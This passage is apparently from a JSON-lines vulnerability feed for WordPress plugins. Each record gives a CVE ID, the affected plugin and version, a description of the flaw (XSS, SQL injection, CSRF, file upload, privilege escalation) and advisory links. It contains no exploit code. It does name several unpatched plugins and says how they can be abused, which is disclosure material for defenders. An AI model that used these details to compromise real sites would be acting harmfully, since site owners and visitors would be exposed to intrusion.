workaround.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896729\\\/powerpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2896729\\\/powerpress\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44583cb7-bc32-4e62-8431-f5f1f6baeff2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44583cb7-bc32-4e62-8431-f5f1f6baeff2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/powerpress\\\/trunk\\\/powerpress-player.php#L102\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899207\\\/powerpress\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2899207\\\/powerpress\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3088","slug":"wp-mail-log","versionImpact":"1.1.1","description":"The WP Mail Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via email contents in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ee1acb-6f0c-40e6-80a0-fc93b61c1602?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86ee1acb-6f0c-40e6-80a0-fc93b61c1602?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931706\\\/wp-mail-log\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2931706\\\/wp-mail-log\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5233","slug":"font-awesome-integration","versionImpact":"5.0","description":"The Font Awesome Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'fawesome' shortcode in versions up to, and including, 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2791f48-895f-4099-87ec-41aaac2494a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a2791f48-895f-4099-87ec-41aaac2494a2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-integration\\\/tags\\\/5.0\\\/font-awesome-integration.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-integration\\\/tags\\\/5.0\\\/font-awesome-integration.php#L48\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35911","slug":"contact-form-generator","versionImpact":"2.6.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Creative Solutions Contact Form Generator : Creative form builder for WordPress allows SQL Injection.This issue affects Contact Form Generator : Creative form builder for WordPress: from n\/a through 2.6.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-generator\\\/wordpress-contact-form-generator-plugin-2-6-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-generator\\\/wordpress-contact-form-generator-plugin-2-6-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4311","slug":"vrm360","versionImpact":"1.2.1","description":"The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21950116-1a69-4848-9da0-e912096c0fce\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/21950116-1a69-4848-9da0-e912096c0fce\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0767","slug":"envo-elementor-for-woocommerce","versionImpact":"1.4.4","description":"The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.4.4. This is due to missing or incorrect nonce validation on the ajax_plugin_activation function. This makes it possible for unauthenticated attackers to activate arbitrary installed plugins via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cca71257-05dc-43d5-8de6-faf0a2feab2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php#L332\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1291","slug":"brizy","versionImpact":"2.4.40","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown URL parameter in all versions up to, and including, 2.4.40 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb4b5165-35a6-47e9-922e-b244b0d006e4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3034945%40brizy%2Ftrunk&old=3032616%40brizy%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2959","slug":"svs-pricing-tables","versionImpact":"1.0.4","description":"The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the savePricingTable() function. This makes it possible for unauthenticated attackers to create and edit pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af081a-807b-48c8-82cd-f87fbef0fbe6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78af081a-807b-48c8-82cd-f87fbef0fbe6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8728","slug":"easy-load-more","versionImpact":"1.0.3","description":"The Easy Load More plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d890e7a5-ea9f-40e5-9549-a6f26421b043?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d890e7a5-ea9f-40e5-9549-a6f26421b043?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-load-more\\\/trunk\\\/includes\\\/class-easy-load-more-settings.php#L268\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-load-more\\\/trunk\\\/includes\\\/class-easy-load-more-settings.php#L268\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12587","slug":"contact-form-master","versionImpact":"1.0.7","description":"The Contact Form Master  WordPress plugin through 1.0.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cb040f5-d154-48ea-a54e-80451054bad8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7cb040f5-d154-48ea-a54e-80451054bad8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12129","slug":"royal-core","versionImpact":"2.9.2","description":"The Royal Core plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'royal_restore_backup' function in all versions up to, and including, 2.9.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/hyperx-portfolio-for-freelancers-agencies\\\/13439786\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/hyperx-portfolio-for-freelancers-agencies\\\/13439786\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6ca0a45-cbb3-419b-a2fd-7427935524d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a6ca0a45-cbb3-419b-a2fd-7427935524d8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13565","slug":"simple-map-no-api","versionImpact":"1.9","description":"The Simple Map No Api plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018width\u2019 parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-map-no-api\\\/trunk\\\/index.php#L242\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-map-no-api\\\/trunk\\\/index.php#L242\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-map-no-api\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-map-no-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d46c87-5c30-4251-941e-a5e52b5d0c9f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d46c87-5c30-4251-941e-a5e52b5d0c9f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4589","slug":"bon-toolkit","versionImpact":"1.3.2","description":"The Bon Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bt-map' shortcode in all versions up to, and including, 1.3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bon-toolkit\\\/trunk\\\/includes\\\/shortcodes.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bon-toolkit\\\/trunk\\\/includes\\\/shortcodes.php#L71\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cafec05-c275-475d-91cf-ed65cd191b0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cafec05-c275-475d-91cf-ed65cd191b0e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5540","slug":"wp-easy-events","versionImpact":"4.1.0","description":"The Event RSVP and Simple Event Management Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'emd_mb_meta' shortcode in all versions up to, and including, 4.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-events\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-easy-events\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f09ffc02-bfed-4aa3-a3d3-58e188b3e147?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f09ffc02-bfed-4aa3-a3d3-58e188b3e147?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7690","slug":"affiliate-plus","versionImpact":"1.3.2","description":"The Affiliate Plus plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation on the 'affiplus_settings' page. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affiplus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affiplus.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affipsettings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/affiliate-plus\\\/trunk\\\/affipsettings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-plus\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/affiliate-plus\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fc6230-043f-4079-a82a-1b5d191dbf7d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3fc6230-043f-4079-a82a-1b5d191dbf7d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0145","slug":"saan-world-clock","versionImpact":"1.8","description":"The Saan World Clock WordPress plugin through 1.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e4b4a2-c7cb-42ce-9d5b-bd84efcbf54d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f4e4b4a2-c7cb-42ce-9d5b-bd84efcbf54d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1910","slug":"getwid","versionImpact":"1.8.3","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to an insufficient capability check on the get_remote_templates function in versions up to, and including, 1.8.3. This makes it possible for authenticated attackers with subscriber-level permissions or above to flush the remote template cache. Cached template information can also be accessed via this endpoint but these are not considered sensitive as they are publicly accessible from the developer's site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/tags\\\/1.8.3\\\/includes\\\/rest-api.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd64ab0-007b-4778-9d92-06e530638fad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6cd64ab0-007b-4778-9d92-06e530638fad?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3087","slug":"fluent-smtp","versionImpact":"2.2.4","description":"The FluentSMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an email subject in versions up to, and including, 2.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Services\\\/Mailer\\\/BaseHandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Services\\\/Mailer\\\/BaseHandler.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa47a794-e5ce-491d-a10b-c7c5718aa853?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa47a794-e5ce-491d-a10b-c7c5718aa853?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2935217\\\/fluent-smtp\\\/trunk\\\/app\\\/Models\\\/Logger.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5232","slug":"font-awesome-more-icons","versionImpact":"3.5","description":"The Font Awesome More Icons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'icon' shortcode in versions up to, and including, 3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15947764-a070-4715-bd44-cb79b62ed59d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15947764-a070-4715-bd44-cb79b62ed59d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-more-icons\\\/tags\\\/3.5\\\/plugin.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/font-awesome-more-icons\\\/tags\\\/3.5\\\/plugin.php#L82\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0766","slug":"envo-elementor-for-woocommerce","versionImpact":"1.4.4","description":"The Envo's Elementor Templates & Widgets for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the templates_ajax_request function in all versions up to, and including, 1.4.4. This makes it possible for subscribers and higher to create templates.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/996c7433-dd82-4216-86b9-005f43c06c3a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-elementor-for-woocommerce\\\/trunk\\\/includes\\\/admin\\\/include\\\/template-library.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1237","slug":"header-footer-elementor","versionImpact":"1.6.24","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the flyout_layout attribute in all versions up to, and including, 1.6.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82644c46-205b-4005-bba8-6b3e45769639?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/82644c46-205b-4005-bba8-6b3e45769639?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.24\\\/inc\\\/widgets-manager\\\/widgets\\\/class-navigation-menu.php#L1951\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.24\\\/inc\\\/widgets-manager\\\/widgets\\\/class-navigation-menu.php#L1951\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034938%40header-footer-elementor&new=3034938%40header-footer-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2958","slug":"svs-pricing-tables","versionImpact":"1.0.4","description":"The SVS Pricing Tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via pricing table settings in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655b35a7-a532-4ceb-aa02-4a8192e6449d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655b35a7-a532-4ceb-aa02-4a8192e6449d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/svs-pricing-tables\\\/trunk\\\/app\\\/model\\\/svs_pt_model_main.php#L61\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5224","slug":"cardoza-facebook-like-box","versionImpact":"4.0","description":"The Easy Social Like Box \u2013 Popup \u2013 Sidebar Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cardoza_facebook_like_box' shortcode in all versions up to, and including, 4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc22a8df-44be-477e-a3b6-67960bf442d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc22a8df-44be-477e-a3b6-67960bf442d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardoza-facebook-like-box\\\/trunk\\\/cardoza_facebook_like_box.php#L839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cardoza-facebook-like-box\\\/trunk\\\/cardoza_facebook_like_box.php#L839\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8727","slug":"dk-pdf","versionImpact":"1.9.6","description":"The DK PDF plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.9.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d71cdd64-7cd6-4b1a-ae8d-e9bf78e630c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d71cdd64-7cd6-4b1a-ae8d-e9bf78e630c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dk-pdf\\\/trunk\\\/includes\\\/class-dkpdf-settings.php#L420\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dk-pdf\\\/trunk\\\/includes\\\/class-dkpdf-settings.php#L420\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12102","slug":"typer-core","versionImpact":"1.9.6","description":"The Typer Core plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.9.6 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access 